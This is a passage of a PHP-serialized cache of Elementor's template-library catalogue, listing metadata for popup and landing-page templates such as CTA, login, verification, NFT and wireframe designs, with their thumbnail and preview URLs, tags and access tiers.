Sale\";s:9:\"thumbnail\";s:99:\"https://library.elementor.com/wp-content/uploads/2022/03/39-Click-Through-Mochi-Shop-Sale-Small.jpg\";s:12:\"tmpl_created\";i:1647867750;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-cta-mochi-shop-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"cta\",\"Offer\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:108;a:21:{s:4:\"tmpl\";i:1392;s:2:\"id\";i:23618;s:5:\"title\";s:28:\"Classic | CTA | Fashion Shop\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2022/03/40-Click-Through-Fashion-Shop-Small.jpg\";s:12:\"tmpl_created\";i:1647868251;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-cta-fashion-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:109;a:21:{s:4:\"tmpl\";i:1393;s:2:\"id\";i:23624;s:5:\"title\";s:29:\"Fly-In | Login | Tech Company\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/41-Login-Tech-Company-Small.jpg\";s:12:\"tmpl_created\";i:1647868704;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/fly-in-login-tech-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:9:\"[\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:110;a:21:{s:4:\"tmpl\";i:1394;s:2:\"id\";i:23630;s:5:\"title\";s:36:\"Fly-In | Verification | Liquor Store\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/42-Verification-Liquor-Store-Small.jpg\";s:12:\"tmpl_created\";i:1647870308;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-verification-liquor-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:16:\"[\"Verification\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:111;a:21:{s:4:\"tmpl\";i:1395;s:2:\"id\";i:23636;s:5:\"title\";s:39:\"Hello Bar | Subscribe | Online Magazine\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/44-Subscribe-Online-Magazine-Small.jpg\";s:12:\"tmpl_created\";i:1647870465;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/hello-bar-subscribe-online-magazine/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:20:\"[\"Blog\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:112;a:21:{s:4:\"tmpl\";i:1396;s:2:\"id\";i:23642;s:5:\"title\";s:27:\"Fly-In | Login | Health Spa\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/43-Login-Health-Spa-Small.jpg\";s:12:\"tmpl_created\";i:1647872427;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/fly-in-login-health-spa/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:20:\"[\"Login\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:113;a:21:{s:4:\"tmpl\";i:1397;s:2:\"id\";i:23648;s:5:\"title\";s:33:\"Fly-In | Verification | Wine Shop\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/45-Verification-Wine-Shop-Small.jpg\";s:12:\"tmpl_created\";i:1647872627;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/fly-in-verification-wine-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:16:\"[\"Verification\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:114;a:21:{s:4:\"tmpl\";i:1421;s:2:\"id\";i:24235;s:5:\"title\";s:24:\"Ladydog Club &#8211; NFT\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/05/Ladydog_Club.jpg\";s:12:\"tmpl_created\";i:1651525072;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/lp/ladydog-club-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:115;a:21:{s:4:\"tmpl\";i:1422;s:2:\"id\";i:24166;s:5:\"title\";s:15:\"Dot &#8211; NFT\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2022/05/Dot-250_280.jpg\";s:12:\"tmpl_created\";i:1651525117;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/lp/dot-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:116;a:21:{s:4:\"tmpl\";i:1423;s:2:\"id\";i:24191;s:5:\"title\";s:28:\"Cosmic Neighbors &#8211; NFT\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Cosmic_Neighbors-250_280.jpg\";s:12:\"tmpl_created\";i:1651525124;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/cosmic-neighbors-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:117;a:21:{s:4:\"tmpl\";i:1424;s:2:\"id\";i:24255;s:5:\"title\";s:30:\"Happy Food Friends &#8211; NFT\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/05/Featured_Image.jpg\";s:12:\"tmpl_created\";i:1651525475;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/happy-food-friends-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:118;a:21:{s:4:\"tmpl\";i:1443;s:2:\"id\";i:24599;s:5:\"title\";s:27:\"Wireframe &#8211; Courses 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Courses-1.jpg\";s:12:\"tmpl_created\";i:1653989626;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/wireframe-courses-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:180:\"[\"About\",\"Academy\",\"Booking\",\"Business\",\"Course Online\",\"Features\",\"Footer\",\"Landing Pages\",\"Online Service\",\"Professional\",\"School\",\"Services\",\"Subscribe\",\"Teacher\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:119;a:21:{s:4:\"tmpl\";i:1444;s:2:\"id\";i:24614;s:5:\"title\";s:28:\"Wireframe &#8211; Services 1\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-1-2.jpg\";s:12:\"tmpl_created\";i:1653990084;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:139:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Form\",\"Header\",\"Landing Pages\",\"Online Service\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:120;a:21:{s:4:\"tmpl\";i:1445;s:2:\"id\";i:24629;s:5:\"title\";s:28:\"Wireframe &#8211; Services 2\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-2-2.jpg\";s:12:\"tmpl_created\";i:1653990132;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:123:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Form\",\"Gallery\",\"Landing Pages\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:121;a:21:{s:4:\"tmpl\";i:1446;s:2:\"id\";i:24644;s:5:\"title\";s:27:\"Wireframe &#8211; Webinar 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Webinar-1.jpg\";s:12:\"tmpl_created\";i:1653990164;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/wireframe-webinar-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:177:\"[\"About\",\"Academy\",\"Booking\",\"Conference\",\"Course Online\",\"Education\",\"Features\",\"Footer\",\"Form\",\"Landing Pages\",\"Online Event\",\"Online Service\",\"Subscribe\",\"Virtual\",\"Webinar\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:122;a:21:{s:4:\"tmpl\";i:1447;s:2:\"id\";i:24655;s:5:\"title\";s:28:\"Wireframe &#8211; Services 3\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-3-2.jpg\";s:12:\"tmpl_created\";i:1653990198;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:143:\"[\"About\",\"Agency\",\"Business\",\"Contact\",\"Footer\",\"Form\",\"Gallery\",\"Landing Pages\",\"Portfolio\",\"Professional\",\"Project\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:123;a:21:{s:4:\"tmpl\";i:1448;s:2:\"id\";i:24677;s:5:\"title\";s:28:\"Wireframe &#8211; Services 4\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-4.jpg\";s:12:\"tmpl_created\";i:1653990233;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:102:\"[\"About\",\"Business\",\"Contact\",\"Footer\",\"Form\",\"Landing Pages\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:124;a:21:{s:4:\"tmpl\";i:1449;s:2:\"id\";i:24687;s:5:\"title\";s:28:\"Wireframe &#8211; Products 1\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Products-1.jpg\";s:12:\"tmpl_created\";i:1653990273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-products-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:128:\"[\"About\",\"Booking\",\"Business\",\"Clients\",\"Ecommerce\",\"Features\",\"Footer\",\"Landing Pages\",\"Products\",\"Sales\",\"Shop\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:125;a:21:{s:4:\"tmpl\";i:1450;s:2:\"id\";i:24706;s:5:\"title\";s:28:\"Wireframe &#8211; Services 5\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-5.jpg\";s:12:\"tmpl_created\";i:1653990322;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:149:\"[\"About\",\"Booking\",\"Consulting\",\"Contact\",\"Doctor\",\"Footer\",\"Form\",\"Header\",\"Landing Pages\",\"Online Service\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:126;a:21:{s:4:\"tmpl\";i:1451;s:2:\"id\";i:23604;s:5:\"title\";s:38:\"Classic | Subscribe | Nail Polish Shop\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2022/03/38-Subscribe-Nail-Polish-Shop-Small.jpg\";s:12:\"tmpl_created\";i:1660205114;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/classic-subscribe-nail-polish-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:20:\"[\"Blog\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:127;a:21:{s:4:\"tmpl\";i:1452;s:2:\"id\";i:23047;s:5:\"title\";s:46:\"Fly-In | Contact | Health &#038; Fitness eBook\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/fitness-ebook-small.jpg\";s:12:\"tmpl_created\";i:1660205149;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/fly-in-contact-health-fitness-ebook/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:28:\"[\"Contact\",\"Ebook\",\"Health\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:128;a:21:{s:4:\"tmpl\";i:1199;s:2:\"id\";i:18839;s:5:\"title\";s:27:\"Hello Bar | CTA | eCommerce\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/05/350x250.png\";s:12:\"tmpl_created\";i:1621870603;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/hello-bar-cta-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:41:\"[\"Ecommerce\",\"Online Shop\",\"Sale\",\"Shop\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:129;a:21:{s:4:\"tmpl\";i:1247;s:2:\"id\";i:21907;s:5:\"title\";s:50:\"Fly-In | Team Details  | Electronic Music Festival\";s:9:\"thumbnail\";s:104:\"https://library.elementor.com/wp-content/uploads/2022/03/Kit-8-electronic-music-festival-CTA-image-1.jpg\";s:12:\"tmpl_created\";i:1646660881;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:157:\"https://library.elementor.com/popups/fly-in-team-details-popup-electronic-music-festival/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:130;a:21:{s:4:\"tmpl\";i:1253;s:2:\"id\";i:22162;s:5:\"title\";s:46:\"Full Screen | Menu | Electronic Music Festival\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/8-music-festival-Team-Details.jpg\";s:12:\"tmpl_created\";i:1647272934;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:154:\"https://library.elementor.com/popups/full-screen-menu-popup-electronic-music-festival/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:131;a:21:{s:4:\"tmpl\";i:1254;s:2:\"id\";i:22172;s:5:\"title\";s:45:\"Classic | Discount | Health &#038; Beauty Spa\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/health-beauty-spa-small.jpg\";s:12:\"tmpl_created\";i:1647273547;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/classic-discount-popup-health-beauty-spa/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:36:\"[\"Hair\",\"Health\",\"Sales\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:132;a:21:{s:4:\"tmpl\";i:1255;s:2:\"id\";i:22183;s:5:\"title\";s:44:\"Hello Bar | CTA | Environmental 